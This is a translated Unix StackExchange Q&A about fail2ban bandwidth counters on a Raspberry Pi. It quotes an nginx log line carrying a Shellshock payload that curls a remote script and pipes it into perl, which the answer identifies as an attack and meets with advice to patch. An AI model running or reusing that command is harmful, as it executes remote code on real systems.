Fail2ban 消耗大量頻寬

我有一個樹莓派，上面有一個 nginx 和一個 ssh 伺服器，我已經安裝iptables並fail2ban限制ssh連接嘗試。問題是fail2ban似乎消耗了大量頻寬：

Chain fail2ban-ssh (1 references)

num pkts bytes target     prot opt in     out     source               destination         
1 933 63565 RETURN     all  --  *      *       0.0.0.0/0            0.0.0.0/0  

它已經消耗了 +- 60kb，而它只打開了幾分鐘，而且ssh自昨天以來我沒有在我的日誌中看到不正確的嘗試。上次它在字節欄位中有 14G…

我的問題：fail2ban 使用的頻寬是否正常？問題是否來自其他地方？

我還在我的 nginx 日誌中看到了這些討厭的日誌：

78.142.173.10 - - [21/Oct/2014:09:33:33 +0000] "GET / HTTP/1.0" 200 99 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"

這可能與問題有關嗎？

幾點：

1)fail2ban只是修改系統配置的邏輯，因此它本身並不真正消耗任何頻寬。

2. 幾分鐘內 60KB 的頻寬根本不算多。

3. 您正在查看的 60KB 頻寬用於匹配失敗事件的網路流量。您無法減少流量，因為您不是產生流量的人。它作為規則的一部分被拒絕的事實表明它可能是您想要阻止fail2ban的流量。

4. nginx 日誌表明遠端攻擊者正在嘗試對您使用 shellshock 漏洞利用。我會確保您已完全修補。

總而言之，該系統實際上按預期工作。如果您想做一些事情來阻止他們的請求，您可以追踪他們正在執行此操作的任何 VPS，並向提供商發送電子郵件以報告源自其網路的濫用行為。

編輯：

出於反常的興趣，我調查了它，攻擊者的 IP 解析為sonne.publicmanagement.at根據 whois 該域的聯繫人，info@publicmanagement.at您at.dom-admin@matthias.subik.de可以嘗試直接通過電子郵件發送給他們。鑑於它來自一家德國供應商，但從看似韓國的網站中提取了一個漏洞，供應商可能不知道正在發生這種情況，這可能只是他們已經紮根的盒子之一（可能以類似的方式） .

引用自：https://unix.stackexchange.com/questions/163542